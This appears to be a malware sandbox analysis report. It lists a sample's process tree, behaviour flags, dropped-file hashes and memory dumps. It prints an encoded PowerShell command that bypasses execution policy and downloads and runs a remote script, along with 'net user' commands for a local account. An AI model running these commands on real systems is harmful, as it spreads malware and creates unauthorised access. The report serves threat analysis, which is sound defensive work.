C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES7535.tmpMD5
623f8149392a752360685aad9197c7ca
SHA10560b55d276649309224e59b75eb339bf92f0d7b
SHA25636f84235392d010b75a44ede7c5ef848ead501e8268b0fafe0c25c7850d93c78
SHA512a8972114dfe95b71b12090998ce4272f5f53f64a581c9dd194ac7b9d043e3fd29cde4c54efcb36a27895278c801f27338ab3303edc25eaa8e8f9ef361e781159
-
C:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.dllMD5
44c73405b93cd7a563864bd0e91ce826
SHA1c004019a330c66edb082920a7dfbd8345471d82b
SHA2562981692ab2abfbbcdb322ba059098baaa2f54f67aa9915ad7957ae0f585fb777
SHA512a2b1c14463da1314e3b6361231da8796fad61f2dd39eded562d60e4d46cdd5acdbfc01e4d14764b7a7fc3064e10e23b174819a457c42fa2a5eeae30cdca5e800
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\CSCA2DC19026E8B41EA9CABCCAEBB4AED5B.TMPMD5
e491d8b5376c80a6a5c8546c6f35778e
SHA1f399519591cada20e4841468ffeec82295ec7c14
SHA256b758abe5750ab5cf9ea05fd45a6faf5e38820466d2ca168b15015aaf0614a5b9
SHA5126eb0c90f95a357c04221661da666d55b6c517dec806ba31dcc2cdd1892c32b183cdefce1a1ed66bc7ea2ddfabfbc7a6ae9bcf8b25d1609db6fe336ff80201271
-
\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.cmdlineMD5
20c1eda5fbd9c49c273416c2922aa7ed
SHA1ba0c5ccffa5c1bee73e0d81b8fc2f0deb9c7b133
SHA2561df07f4ff66b20617de825bb346218701eb6b1b3e48696ccaab8125b32609cbd
SHA512c38b96823a2a0377b03f280c732765cd6976e18080159194a406f6c8a72ba43d289d1c29efa5ee5b76776a91a1f734d7c06e3112e1bd1bd004486f9f2fb20c92
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/68-24-0x0000000000000000-mapping.dmp
-
memory/188-21-0x0000000000000000-mapping.dmp
-
memory/396-52-0x0000000000000000-mapping.dmp
-
memory/420-44-0x0000000000000000-mapping.dmp
-
memory/420-54-0x0000000000000000-mapping.dmp
-
memory/432-31-0x0000000000000000-mapping.dmp
-
memory/520-22-0x0000000000000000-mapping.dmp
-
memory/740-51-0x0000000000000000-mapping.dmp
-
memory/748-36-0x0000000000000000-mapping.dmp
-
memory/760-4-0x0000027772D90000-0x0000027772D91000-memory.dmpFilesize
4KB
-
memory/760-5-0x0000027772F40000-0x0000027772F41000-memory.dmpFilesize
4KB
-
memory/760-2-0x0000000000000000-mapping.dmp
-
memory/760-3-0x00007FF897720000-0x00007FF89810C000-memory.dmpFilesize
9.9MB
-
memory/760-14-0x0000027772ED0000-0x0000027772ED1000-memory.dmpFilesize
4KB
-
memory/908-38-0x0000000000000000-mapping.dmp
-
memory/940-25-0x0000000000000000-mapping.dmp
-
memory/1332-10-0x0000000000000000-mapping.dmp
-
memory/1344-27-0x0000000000000000-mapping.dmp
-
memory/1356-26-0x0000000000000000-mapping.dmp
-
memory/1788-45-0x0000000000000000-mapping.dmp
-
memory/2044-41-0x0000000000000000-mapping.dmp
-
memory/2068-30-0x0000000000000000-mapping.dmp
-
memory/2212-39-0x0000000000000000-mapping.dmp
-
memory/2220-20-0x0000000000000000-mapping.dmp
-
memory/2228-35-0x0000000000000000-mapping.dmp
-
memory/2292-23-0x0000000000000000-mapping.dmp
-
memory/2296-47-0x00007FF897720000-0x00007FF89810C000-memory.dmpFilesize
9.9MB
-
memory/2296-46-0x0000000000000000-mapping.dmp
-
memory/2436-18-0x0000000000000000-mapping.dmp
-
memory/2456-34-0x0000000000000000-mapping.dmp
-
memory/2580-19-0x0000000000000000-mapping.dmp
-
memory/2684-40-0x0000000000000000-mapping.dmp
-
memory/2684-16-0x0000000000000000-mapping.dmp
-
memory/2688-15-0x0000000000000000-mapping.dmp
-
memory/2768-37-0x0000000000000000-mapping.dmp
-
memory/2768-53-0x0000000000000000-mapping.dmp
-
memory/3356-32-0x0000000000000000-mapping.dmp
-
memory/3372-1-0x00000000029E0000-0x00000000029E1000-memory.dmpFilesize
4KB
-
memory/3452-43-0x0000000000000000-mapping.dmp
-
memory/3532-7-0x0000000000000000-mapping.dmp
-
memory/4056-17-0x0000000000000000-mapping.dmp
-
memory/4088-33-0x0000000000000000-mapping.dmp